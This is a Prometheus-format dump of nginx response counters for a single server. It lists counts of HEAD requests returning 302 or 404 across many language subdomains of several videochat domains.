nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="th.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="th.videochat.tv.br"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="th.videochat.world"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tl.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tl.videochat.date"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tl.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tl.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tt.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="udm.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="uk.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ur.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ur.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="uz.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="uz.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="uz.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="vi.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="vi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="vi.videochat.world"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.cafe"} 1036 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.date"} 1054 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.mx"} 1053 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.show"} 1091 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.tv.br"} 1005 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.world"} 1159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="vmi460104.contaboserver.net"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="www.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="www.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="xh.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="yi.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="yi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="yi.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="zh.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="zh.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="-"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="112.124.42.80:63435"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="161.97.120.25"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="161.97.120.25:80"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="aapfusu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="af.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="af.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="af.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="af.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="aivwnaz.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="al.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="al.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="al.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="al.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="amadorseniorcenter-oit.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="api.videochat.mx"} 160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ar.videochat.cafe"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ar.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ar.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ar.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ar.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="asset.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.world"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.mx"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="be.videochat.cafe"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="be.videochat.date"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="be.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="be.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="be.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bg.videochat.cafe"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bg.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bg.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bg.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bn.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bn.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bn.videochat.tv.br"} 212 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bn.videochat.world"} 941 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bs.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bs.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bs.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bs.videochat.world"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ca.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ca.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ca.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ceb.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ceb.videochat.date"} 602 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ceb.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ceb.videochat.world"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.date"} 552 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.show"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.tv.br"} 342 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.world"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cloijsk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="col.pagos-simit.cc"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.date"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.world"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cy.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cy.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cy.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cy.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="czhdzka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="da.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="da.videochat.date"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="da.videochat.tv.br"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="da.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="de.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="de.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="de.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="de.videochat.world"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.date"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.tv.br"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.world"} 469 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="el.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="el.videochat.mx"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="el.videochat.tv.br"} 81 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="el.videochat.world"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="en.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="en.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="en.videochat.tv.br"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eo.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eo.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eo.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="es.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="es.videochat.date"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="es.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="es.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="et.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="et.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="et.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eu.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eu.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eu.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eu.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.mx"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.tv.br"} 161 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.world"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.date"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.mx"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.show"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.tv.br"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fpaaipap.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fr.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fr.videochat.mx"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fr.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fr.videochat.world"} 112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ga.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ga.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ga.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ga.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ga.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.tv.br"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.world"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gu.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gu.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gu.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gu.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gu.videochat.world"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.date"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.world"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.date"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.world"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.show"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hrwqvkn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ht.videochat.cafe"} 556 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ht.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ht.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ht.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="httpgl.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hu.videochat.cafe"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hu.videochat.date"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hu.videochat.tv.br"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hu.videochat.world"} 175 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="id.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="id.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="id.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="id.videochat.world"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="is.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="is.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="is.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="is.videochat.world"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="it.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="it.videochat.date"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="it.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="it.videochat.world"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jp.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jp.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jp.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jp.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jp.videochat.world"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jutvtfa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jv.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jv.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jv.videochat.tv.br"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jv.videochat.world"} 192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ka.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ka.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ka.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ka.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kk.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kk.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kk.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.date"} 562 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.tv.br"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kn.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kn.videochat.tv.br"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kn.videochat.world"} 1542 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ko.videochat.date"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ko.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ko.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ko.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ky.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ky.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ky.videochat.show"} 1836 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ky.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ky.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lb.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lb.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lb.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lb.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.date"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.world"} 96 